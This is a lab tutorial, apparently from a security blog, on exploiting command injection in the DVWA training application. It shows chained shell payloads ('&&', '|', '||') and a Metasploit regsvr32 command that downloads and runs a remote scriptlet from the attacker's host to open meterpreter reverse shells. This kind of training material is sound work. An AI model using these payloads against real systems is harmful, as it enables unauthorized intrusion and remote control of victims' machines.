Command Injection Exploitation in DVWA using Metasploit (Bypass All Security)

[solidsnake]

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

First install the DVWA in your PC full article read here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

Use “&&” in command injection to bypass low security of this server.

Go to the command execution page Enter an IP address and click on submit.

Now you can see the reply that tells us that we have establish a connection with the server. I have tried this numerous times just to be sure and so can you, therefore, whenever you will execute this cammand you will see the following :

We can also implement multiple commands simultaneously just by using & sign. For example next command is :

192.168.1.100 && dir

After the above command click on submit, performing the said command will itemize all directories and files.

We have found 4 directories and a file and also that path of the directory.

Next command is 192.168.1.100 && net user click on submit, this command will show the user’s list

Various commands are available which when submitted will give the intended outcome. So firstly, we will find a way to transfer our malevolent payload to the remote machine and for that I am using my favorite tool metasploit. To use metasploit al you have to do is type msfconsole in kali terminal and then type the following commands

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport  4444
msf exploit(regsvr32_applocker_bypass_server) > exploit

We can use the following command in order to open a port on the remote host and to connect back to it with metasploit.

192.168.1.100 && regsvr32 /s /n /u /i:
http://192.168.1.103:8080/C99PdFH.sct scrobj.dll

and click on submit

Now you will get meterpreter session of victim’s PC. And type sysinfo to get system information.

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level Medium

Use pipe “|” in command injection to bypass medium security of this server.

Follow same process as above using metasploit and further type :

192.168.1.100 | regsvr32 /s /n /u /i:
http://192.168.1.103:8080/C99PdFH.sct scrobj.dll

Again we got meterpreter session 2

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

Try to use pipe “||” in command injection to bypass high security of this server

Follow same process as above using metasploit

192.168.1.100 || regsvr32 /s /n /u /i:
http://192.168.1.103:8080/C99PdFH.sct scrobj.dll

and click on submit

Yes, we have got meterpreter session 3!!

Finally we have completed all three level low, medium, high in DVWA.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here